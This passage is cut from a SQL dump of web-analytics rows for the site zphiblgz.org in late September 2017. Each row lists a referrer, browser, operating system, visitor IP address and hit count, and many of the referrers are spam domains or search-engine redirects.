,'Linux','26.0.1410.63','','185.7.214.11','000',8,0),(11624,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(11625,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.82','000',1,0),(11626,'2017-09-24','https://ww2awards.info/','Opera','Windows','9.00','','46.118.159.26','000',1,0),(11627,'2017-09-24','https://www.mb140.ru/','MSIE','Windows','6.0','','188.163.72.15','000',1,0),(11628,'2017-09-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11629,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.189.188.111','000',2,0),(11630,'2017-09-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.167.223.38','000',1,0),(11631,'2017-09-24','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(11632,'2017-09-24','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.35.179','000',5,0),(11633,'2017-09-24','http://zphiblgz.org','Firefox','Windows','40.1','','197.2.26.204','000',2,0),(11634,'2017-09-24','http://03p.info/','MSIE','Windows','5.5','','46.118.154.197','000',3,0),(11635,'2017-09-25','http://zphiblgz.org/service/','Chrome','Chrome OS','60.0.3112.112','','69.143.35.179','000',2,0),(11636,'2017-09-25','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','88.99.104.224','000',1,0),(11637,'2017-09-25','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',50,0),(11638,'2017-09-25','https://univerfiles.com/','MSIE','Windows','2.0','','46.118.158.19','000',3,0),(11639,'2017-09-25','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','91.210.147.176','000',22,0),(11640,'2017-09-25','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','84.200.17.87','000',2,0),(11641,'2017-09-25','http://zphiblgz.org/','Chrome','Windows','36.0.1985.143','','84.200.17.87','000',9,0),(11642,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.106.162','000',2,0),(11643,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.117','000',1,0),(11644,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.198','000',2,0),(11645,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.141','000',2,0),(11646,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.172','000',1,0),(11647,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.250','000',2,0),(11648,'2017-09-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.234','000',2,0),(11649,'2017-09-25','https://stillmiracle.com/','MSIE','Windows','5.5','','46.118.159.26','000',3,0),(11650,'2017-09-25','http://zphiblgz.org','watson-url-fetcher','Unknown','Unknown','','169.47.201.112','000',1,0),(11651,'2017-09-25','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.137','000',1,0),(11652,'2017-09-25','http://zphiblgz.org','Firefox','Windows','5.0','','78.24.217.246','000',1,0),(11653,'2017-09-25','http://zphiblgz.org','MSIE','Windows','6.0','','45.55.224.77','000',1,0),(11654,'2017-09-25','https://timhost.ru/','Opera','Windows','7.11','','46.118.158.19','000',1,0),(11655,'2017-09-25','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',2,0),(11656,'2017-09-25','http://www.bsfcn.org/3/miscellaneous6.htm','Chrome','Linux','46.0.2490.80','','185.174.137.249','000',1,0),(11657,'2017-09-25','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.24.20','000',2,0),(11658,'2017-09-25','http://zphiblgz.org','Firefox','Windows','34.0','','83.220.237.85','000',2,0),(11659,'2017-09-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.57','000',1,0),(11660,'2017-09-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1555.bqPqFtlmf6dzjVqlfJyFWF9YWmcKsIzgEoO1OgtnLiwPGMK291KRFT7uuvyPo2PB.a15a40a21f03a77ad00f1b0f7570039d0965cba4&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtRcmZLUWt4OXlYQ1V4ZjR5S1NxMXAxcDdJdUhPVGQ5dGI3ZXBYRnpFck5R&b64e=2&sign=7c070e71eb2e156f8a5592c39126ec3e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlh9Tdc3CgJ3F_w_e_jQ8lj3V8zdjyevSJuu4Cpn359tbPeEQF3k1PRyVaJZ9y0JBfOp6QUvHvVGJZnGDoyVBVTQWhZQ8SIynWLyf2BCLLq4BovfzZI1q2jkTBVIuM-UTr&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuHDDBx5409yX2OPRAPXIgegJRf7sXE9zcR-lLZ8uCu17EmQeN6E1IuqGiW6-CzMpWw&l10n=ru&cts=1506341029884&mc=6.70227149899','Firefox','Windows','53.0','','109.63.171.74','000',1,0),(11661,'2017-09-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','121.78.145.18','000',4,0),(11662,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','86.1.120.122','000',2,0),(11663,'2017-09-25','http://taraz.xkaz.org/','Opera','Windows','7.0','','46.118.159.26','000',3,0),(11664,'2017-09-25','http://www.zahvat.ru/','MSIE','Unknown','7.0b','','188.163.72.15','000',2,0),(11665,'2017-09-25','http://www.osnova3.ru/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11666,'2017-09-25','http://zphiblgz.org/wp-admin/admin.php?page=gf_edit_forms&id=8','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',2,0),(11667,'2017-09-25','https://www.google.com/','Chrome','Windows','56.0.2924.87','','50.96.123.46','000',2,0),(11668,'2017-09-25','https://www.google.com/','Chrome','Macintosh','60.0.3112.113','','166.91.10.34','000',1,0),(11669,'2017-09-25','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(11670,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','117.227.123.240','000',2,0),(11671,'2017-09-25','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','188.226.129.55','000',1,0),(11672,'2017-09-25','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','91.210.147.176','000',2,0),(11673,'2017-09-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(11674,'2017-09-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(11675,'2017-09-25','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.106.211.151','000',1,0),(11676,'2017-09-25','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11677,'2017-09-25','https://klumba55.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11678,'2017-09-25','https://www.google.com/','Safari','iPhone','11.0','','208.54.35.221','000',3,0),(11679,'2017-09-25','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.9.209','000',1,0),(11680,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.146.58.35','000',2,0),(11681,'2017-09-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11682,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(11683,'2017-09-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.220.246.230','000',1,0),(11684,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.48.120.196','000',2,0),(11685,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(11686,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.212.104','000',2,0),(11687,'2017-09-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1555.WN53OnvMBh-0BTwrTKs7TJn-65_HdYM_0IKgP_1KFm--x2hjPCSZ9rrPt_7zgEkt.51034b56f87a848309dbd03f185997abd628853d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtYOFRTMmtZcUstbktUUmV3akxCdXUyeGVhYlR0cktYR04yY1NSR0Z3eEtJ&b64e=2&sign=4cec26d1cf8d525e8254f9e1f0890805&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfbULBvQMDD3UzrCKzWn1ZP8xxlAQxLgpT2K09uKjFYlTh8n7edFyjipS0hDNdqUDJyyaF1T--6bboJru3JZ8d_ZAaBF5EIa_zB9jgHVH1ytZ289yYnuUeoEbQ1m24TQYP&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0ymOZRkwN2WcWpC51A1kLa025i-XwcfM3EbxYRjv5xpaGCxuG8Cj5hbFAiNVJBxk7Qg&l10n=ru&cts=1506379844785&mc=1.81840781178','Firefox','Windows','53.0','','176.15.43.101','000',1,0),(11688,'2017-09-25','http://zphiblgz.org','Firefox','Windows','34.0','','77.34.10.29','000',2,0),(11689,'2017-09-25','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','96.255.163.84','000',2,0),(11690,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',2,0),(11691,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','73.95.114.15','000',2,0),(11692,'2017-09-25','https://www.google.com/','Safari','Macintosh','10.1.2','','73.135.240.177','000',1,0),(11693,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','84.108.101.215','000',2,0),(11694,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',1,0),(11695,'2017-09-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','67.205.146.164','000',1,0),(11696,'2017-09-25','http://m.facebook.com','Safari','iPhone','10.0','','173.252.123.180','000',1,0),(11697,'2017-09-25','http://m.facebook.com','Safari','iPhone','10.0','','173.252.123.181','000',1,0),(11698,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','37.105.227.83','000',1,0),(11699,'2017-09-25','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','51.254.66.163','000',2,0),(11700,'2017-09-25','http://zphiblgz.org','wp-android','Unknown','Unknown','','51.254.66.163','000',1,0),(11701,'2017-09-25','http://zphiblgz.org','Chrome','Windows','50.0.2661.94','','192.187.101.170','000',1,0),(11702,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.81','000',2,0),(11703,'2017-09-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',2,0),(11704,'2017-09-25','http://zphiblgz.org','Firefox','Windows','40.1','','202.55.87.126','000',2,0),(11705,'2017-09-25','http://dverimegapolis.ru/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11706,'2017-09-25','http://zphiblgz.org','MSIE','Windows','11.0','','144.217.116.154','000',1,0),(11707,'2017-09-25','https://sajatvelemeny.com/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11708,'2017-09-25','http://zphiblgz.org','Chrome','Windows','59.0.3071.71','','221.4.168.73','000',1,0),(11709,'2017-09-25','http://zphiblgz.org','my','Unknown','Unknown','','185.129.148.167','000',1,0),(11710,'2017-09-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11711,'2017-09-26','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1556.16yRqJQNq5sac46DZtbws9WHqMthz3q1Nkg8ILKaVHQ6nYJDjWTS9Pgda_hTZQNn.f6e385c4a26ebcda0d05f7d32da9054e3b82e5f6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtVMzJXb3NvT3QtMnVqcWVwR2l3bW5vUWh4aWlDSG5nSHBVWW9QRzh0c1pi&b64e=2&sign=c191d262ddb87a59669050d403a8b7ea&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiGo9ds7gJNzqWYJj-cJN9PTXLEnmypl8P2_QjChsJ34diMwRXcZCFQQxit2uIiPpMvEATIIpMcKins_hyjpzqWLFs9YSK1j5557qPEAY2nzSG53pF9zZOW02SgHxehf1D&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUrYE_V40103ppdZ-jkmsCRdbG5atPprifIkqGbICwB2w87PDza3kqPIAKCtPc0Si9hBsE6Pax1Og&l10n=ru&cts=1506402980765&mc=6.52908555317','Firefox','Windows','53.0','','176.15.224.76','000',1,0),(11712,'2017-09-26','https://www.google.com/','Chrome','Windows','61.0.3163.100','','107.218.129.130','000',3,0),(11713,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(11714,'2017-09-26','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1556.SP2Gv36KjkZpmIzJiqjw0LhpO4kpORQMMcUIYfnWpfUZDOXhJVyOm8wFqaq-dlT1.4383157b781bdf9103a7486ef19bd4908090a0bb&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtkM0tpWEtWa3gxdk5UTm8tcTY0UkJweTVFZGxnUWx2RkUyNERKWnNMWDNH&b64e=2&sign=9b8b14b35a217772ee711a1188ba007f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbizmt4TQQgJq8yVOCRmdqCllTwk2a22Gd_VxIXURhY7YBpkU_FuyMslyU3-rZ9wEWlgIr-jmzUQUIRMMWcfwgxO6I7fcqH7TgH-HMPSipVAW3j8DThMIyiWVCSdxi2LDof&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIOxf1EJtSQs-XLw9ave7Yv6Os3o2M1tHXOTeAwgUR6bIqjs9YBSHoU2pJoimfnxVILw&l10n=ru&cts=1506408565606&mc=2.55599614584','Firefox','Windows','53.0','','109.63.254.250','000',1,0),(11715,'2017-09-26','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.42','000',1,0),(11716,'2017-09-26','http://zphiblgz.org','Firefox','Windows','40.1','','77.31.36.3','000',2,0),(11717,'2017-09-26','https://educontest.net/','Unknown','Unknown','Unknown','','188.163.72.15','000',1,0),(11718,'2017-09-26','http://zphiblgz.org','Chrome','Windows','49.0.2623.110','','204.12.250.218','000',1,0),(11719,'2017-09-26','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',138,0),(11720,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(11721,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.146.58.35','000',2,0),(11722,'2017-09-26','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','18.221.54.147','000',1,0),(11723,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',1,0),(11724,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','67.205.146.164','000',1,0),(11725,'2017-09-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.33.5.110','000',2,0),(11726,'2017-09-26','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1556.ir1pun7EfMpIXIGa1uC9zlUinY7lVGh9vSfgYNpeWJ_p4UThFw_M9qDD2T7lf_Av.4fdbaf64f35f8f8b35ce6ad05b6e9d88e41cff50&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtVbXFuMWo2MGVmNk15NFBuQk1BTzVVYjUzbXBienY0dVhmQkd5LWdpUC1T&b64e=2&sign=ba59c2c4842bdb722a99144f6481fa37&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbaXw4mp-kInmi9rDDIRq_C_6eSWlEb7-dBebTd7cZQvbdFQNEE899mNtJRWuOTYBXSkXLaH8nrrHoGX0LQ4QIbpr-D6iSmrc5TsyRhC7mSIZ32gxdAgCyH49SzjeWaC6l8&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUrYE_V40103sb21Z8frQFJl3QlArQR-XymzEBqvYZ3OhDEMpvK2ODsxX6gtppCWVsYwGmqHWlP4w&l10n=ru&cts=1506423612108&mc=6.72742630413','Firefox','Windows','53.0','','46.188.52.143','000',1,0),(11727,'2017-09-26','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(11728,'2017-09-26','http://zphiblgz.org','Firefox','Windows','40.1','','91.179.49.7','000',2,0),(11729,'2017-09-26','https://www.google.com/','Safari','iPhone','11.0','','100.36.98.55','000',7,0),(11730,'2017-09-26','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','193.202.110.18','000',1,0),(11731,'2017-09-26','https://www.mb140.ru/','MSIE','Windows','6.0','','188.163.72.15','000',1,0),(11732,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.191','000',2,0),(11733,'2017-09-26','http://yoshkarola.zrus.org/','Opera','Windows','9.0','','46.118.158.19','000',2,0),(11734,'2017-09-26','http://www.zphiblgz.org/wp-content/themes/organizer/lib_upload/server/php/','Chrome','Windows','42.0.2311.152','','209.90.225.210','000',2,0),(11735,'2017-09-26','http://zphiblgz.org','Firefox','Windows','40.1','','73.41.8.78','000',2,0),(11736,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',4,0),(11737,'2017-09-26','http://zphiblgz.org','Firefox','Windows','40.1','','86.126.121.109','000',2,0),(11738,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(11739,'2017-09-26','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(11740,'2017-09-26','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','70.108.244.221','000',6,0),(11741,'2017-09-26','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(11742,'2017-09-26','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.59.144','000',1,0),(11743,'2017-09-26','android-app://com.google.android.googlequicksearchbox','Chrome','Android','60.0.3112.116','','66.87.81.240','000',4,0),(11744,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(11745,'2017-09-26','http://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',4,0),(11746,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.90.244.23','000',1,0),(11747,'2017-09-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.25','000',1,0),(11748,'2017-09-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(11749,'2017-09-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(11750,'2017-09-26','http://zphiblgz.org','Edge','Windows','15.15063','','73.213.22.160','000',13,0),(11751,'2017-09-26','http://m.facebook.com/','Chrome','Android','60.0.3112.116','','96.88.237.118','000',2,0),(11752,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(11753,'2017-09-26','http://zphiblgz.org','Safari','iPhone','11.0','','172.56.29.49','000',1,0),(11754,'2017-09-26','http://zphiblgz.org','Chrome','Linux','28.0.1500.71','','196.18.158.25','000',2,0),(11755,'2017-09-26','http://zphiblgz.org','Firefox','Linux','45.0','','46.229.170.197','000',1,0),(11756,'2017-09-26','http://zphiblgz.org','Chrome','Linux','57.0.2987.98','','46.229.170.197','000',1,0),(11757,'2017-09-26','http://zphiblgz.org/scholarship/application/','Safari','iPhone','10.0','','174.205.13.252','000',3,0),(11758,'2017-09-26','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.113','','212.237.27.97','000',1,0),(11759,'2017-09-26','http://zphiblgz.org','Chrome','Android','60.0.3112.116','','174.204.11.48','000',1,0),(11760,'2017-09-26','http://zphiblgz.org','Firefox','Windows','42.0','','23.229.56.23','000',2,0),(11761,'2017-09-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.120.37.22','000',2,0),(11762,'2017-09-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.120','000',1,0),(11763,'2017-09-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','119.29.191.171','000',9,0),(11764,'2017-09-26','http://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',4,0),(11765,'2017-09-26','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','138.128.227.2','000',1,0),(11766,'2017-09-26','http://life-instyle.com/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11767,'2017-09-26','https://via-energy-acquistare.com/','MSIE','Unknown','7.0b','','46.118.159.26','000',1,0),(11768,'2017-09-26','http://zphiblgz.org','Firefox','Windows','40.1','','71.43.14.74','000',2,0),(11769,'2017-09-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','54.235.28.149','000',2,0),(11770,'2017-09-27','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',71,0),(11771,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.100.148.112','000',2,0),(11772,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',2,0),(11773,'2017-09-27','http://x-lime.net/','MSIE','Windows','6.0','','46.118.159.26','000',8,0),(11774,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.246.163.141','000',1,0),(11775,'2017-09-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(11776,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(11777,'2017-09-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','34.227.78.144','000',1,0),(11778,'2017-09-27','http://zphiblgz.org','Firefox','Windows','34.0','','31.132.181.124','000',2,0),(11779,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(11780,'2017-09-27','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','101.0.112.6','000',1,0),(11781,'2017-09-27','http://zphiblgz.org','Firefox','Windows','40.1','','120.62.11.187','000',2,0),(11782,'2017-09-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','52.23.160.253','000',1,0),(11783,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(11784,'2017-09-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(11785,'2017-09-27','http://lawyers.cafe/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11786,'2017-09-27','http://copro.pw/','Unknown','Unknown','Unknown','','46.118.158.19','000',1,0),(11787,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(11788,'2017-09-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','158.69.83.25','000',1,0),(11789,'2017-09-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','54.86.133.72','000',1,0),(11790,'2017-09-27','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(11791,'2017-09-27','https://kiskinhouse.com/','MSIE','Windows','7.0a1','','46.118.158.19','000',3,0),(11792,'2017-09-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11793,'2017-09-27','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',6,0),(11794,'2017-09-27','http://zphiblgz.org/','Safari','iPad','11.0','','71.121.204.212','000',1,0),(11795,'2017-09-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','54.172.142.145','000',1,0),(11796,'2017-09-27','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1557.dTrekhcC_mphL_OVLwXTXfpLENWe4JZK_r18hWi_HDF0_gaInTa3rzNt7lYxvIoR.89a6d4377854d5b5ceb5aeb581caa7eed06de7fe&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtkQ3o4cVZPTkNaU2J2SWYxek5DdE1iT183RGx4SWlrQlFPNmRGVWthTHhY&b64e=2&sign=91fc318df9e5dca655b526687e88e4f5&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlplrJXTG_1CSkAT1Xhbt5GO68bHOWp5CyRQ_MNKiG5MVX1D9U9V0w5nTwkfbKllui5Di6cnCeZPEOo_kp1w7eZCqKOPpghRnuY4aLPcAEVHXeMbST-qJUvw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuEuS6cIHgIIw6XeYFjjC7hKcfhyad-uePUH3mMeBJrKluVip0Ed6HHXdh6fB3MgLmg&l10n=ru&cts=1506513726601&mc=3.85873344065','Firefox','Windows','53.0','','176.15.177.196','000',1,0),(11797,'2017-09-27','http://zphiblgz.org','Firefox','Windows','40.1','','46.38.72.104','000',2,0),(11798,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(11799,'2017-09-27','http://optom-deshevo.ru/','Opera','Windows','7.02','','46.118.158.19','000',1,0),(11800,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',1,0),(11801,'2017-09-27','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',16,0),(11802,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','167.114.251.167','000',1,0),(11803,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(11804,'2017-09-27','http://zphiblgz.org','Firefox','Windows','40.1','','103.221.210.45','000',2,0),(11805,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.68','000',2,0),(11806,'2017-09-27','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','192.163.247.11','000',2,0),(11807,'2017-09-27','http://zphiblgz.org','MSIE','Windows','11.0','','172.82.186.170','000',1,0),(11808,'2017-09-27','http://zphiblgz.org','Firefox','Linux','41.0','','192.243.53.20','000',3,0),(11809,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(11810,'2017-09-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(11811,'2017-09-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(11812,'2017-09-27','https://www.google.com/','Chrome','Windows','61.0.3163.100','','164.82.84.23','000',1,0),(11813,'2017-09-27','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(11814,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',2,0),(11815,'2017-09-27','https://mojaocena.com/','MSIE','Windows','5.5','','188.163.72.15','000',3,0),(11816,'2017-09-27','https://mega-polis.biz.ua/','MSIE','Windows','6.0','','46.118.154.197','000',6,0),(11817,'2017-09-27','http://krasivoe-hd.net/','Opera','Windows','7.54','','46.118.154.197','000',2,0),(11818,'2017-09-27','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(11819,'2017-09-27','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.51.197.174','000',5,0),(11820,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.226','000',2,0),(11821,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.209.52.238','000',2,0),(11822,'2017-09-27','http://www.muz-baza.net/','MSIE','Windows','4.01','','188.163.72.15','000',3,0),(11823,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.248.2.85','000',2,0),(11824,'2017-09-27','http://zphiblgz.org/','Safari','iPhone','10.0','','172.58.184.102','000',1,0),(11825,'2017-09-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(11826,'2017-09-27','http://zphiblgz.org','Safari','iPhone','11.0','','75.148.9.113','000',2,0),(11827,'2017-09-27','http://zphiblgz.org/','Chrom